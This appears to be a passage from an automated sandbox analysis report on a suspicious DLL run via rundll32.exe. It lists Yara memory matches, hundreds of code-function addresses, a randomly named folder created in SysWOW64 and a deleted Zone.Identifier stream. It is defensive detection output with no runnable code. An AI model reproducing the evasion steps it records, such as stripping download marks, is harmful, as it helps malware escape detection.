                      Source: Yara matchFile source: 00000006.00000003.359302351.0000000000C16000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.361400733.0000000000BDA000.00000004.00000020.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Source: qrb6jVwzoe.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\SysWOW64\Mkjhtkxzcnwc\pevpdfyikq.vhc:Zone.IdentifierJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Mkjhtkxzcnwc\Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F31BB30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F319F20
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F31B2B0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F326564
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F31B080
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F31BB30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F319F20
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F31B2B0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F326564
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F31B080
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000441E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001CAA8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100143B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10004C00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10008C09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10011C10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000F41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000EC27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001F83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001E441
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10002043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10003845
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000A048
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001406E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10001C76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001748A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000CC8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001D091
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10003C91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000AC95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001AC9B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100178A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100144AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100190BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100198BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100208D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001CCD4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001ECE3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001A8F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100030F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10003502
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001FD10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000251C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10005923
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002292B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001F14D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000C158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001056A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10014D8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000758F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000FD91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10021193
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001D99A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10019DA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001B1B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100225C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100055E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000C5FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10001A0A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000220A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000E21C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10015220
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10009E22
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000D223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10021A3C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10002A46
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10002654
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10009A57
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10007283
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10020687
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10014E8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000FEA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001D6A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000DAAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10005AB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001BEC9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10017ED1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10010ADE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001AEEB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001DEF4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10002309
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10006B25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10020B34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10021343
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10003345
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10003F5C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10011F6B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10009384
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10004F8E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001B397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10012FA2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10014BAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10017BB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000BFB6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10006FC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000A3DF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001BFE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100203F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10004C00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000441E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000F41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10002043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10003845
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10002A46
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1001CAA8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_100190BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_100208D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1001ECE3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1001AEEB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1001DEF4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1001056A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10009384
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1001D99A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10017BB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10008C09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10001A0A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000220A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10011C10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000E21C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10015220
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10009E22
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000D223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000EC27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1001F83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10021A3C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1001E441
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000A048
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10002654
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10009A57
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1001406E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10001C76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10007283
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10020687
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10014E8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1001748A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000CC8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1001D091
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10003C91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000AC95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1001AC9B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000FEA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_100178A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1001D6A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_100144AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000DAAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10005AB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_100198BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1001BEC9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10017ED1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1001CCD4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10010ADE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1001A8F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_100030F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10003502
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10002309
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1001FD10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000251C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10005923
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10006B25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1002292B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10020B34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10021343
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10003345
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1001F14D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000C158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10003F5C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10011F6B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1001577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10014D8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10004F8E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000758F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000FD91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10021193
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1001B397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10019DA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10012FA2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10014BAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_100143B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1001B1B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000BFB6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_100225C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10006FC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000A3DF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_100055E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1001BFE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_100203F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000C5FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10004C00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000441E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10003845
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10002A46
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_100208D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1001ECE3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1001AEEB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1001DEF4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10009384
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1001D99A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10017BB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10008C09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10001A0A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000220A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10011C10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000E21C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000F41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10015220
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10009E22
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000D223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000EC27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1001F83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10021A3C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1001E441
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10002043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000A048
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10002654
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10009A57
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1001406E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10001C76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10007283
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10020687
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10014E8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1001748A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000CC8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1001D091
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10003C91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000AC95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1001AC9B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000FEA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_100178A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1001D6A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1001CAA8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_100144AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000DAAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10005AB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_100190BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_100198BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1001BEC9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10017ED1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1001CCD4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10010ADE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1001A8F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_100030F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10003502
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10002309
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1001FD10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000251C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10005923
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10006B25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1002292B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10020B34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10021343
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10003345
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1001F14D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000C158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10003F5C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10011F6B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1001056A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1001577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10014D8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10004F8E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000758F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000FD91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10021193
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1001B397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10019DA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10012FA2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10014BAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_100143B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1001B1B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000BFB6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_100225C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10006FC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000A3DF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_100055E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1001BFE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_100203F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000C5FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000441E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001CAA8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100143B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004C00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008C09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001A0A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000220A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10011C10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000E21C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10015220
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10009E22
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000EC27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001F83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10021A3C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001E441
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003845
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002A46
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A048
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002654
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10009A57
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001406E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001C76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007283
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10020687
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10014E8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001748A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000CC8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D091
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003C91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000AC95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001AC9B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000FEA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100178A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D6A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100144AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000DAAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10005AB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100190BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100198BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001BEC9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10017ED1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100208D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001CCD4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10010ADE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001ECE3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001AEEB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001A8F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DEF4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100030F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003502
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002309
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001FD10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000251C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10005923
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10006B25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1002292B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10020B34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10021343
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003345
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001F14D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003F5C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10011F6B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001056A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10009384
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10014D8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004F8E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000758F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000FD91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10021193
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001B397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D99A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10019DA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10012FA2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10014BAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10017BB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001B1B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000BFB6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100225C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10006FC4
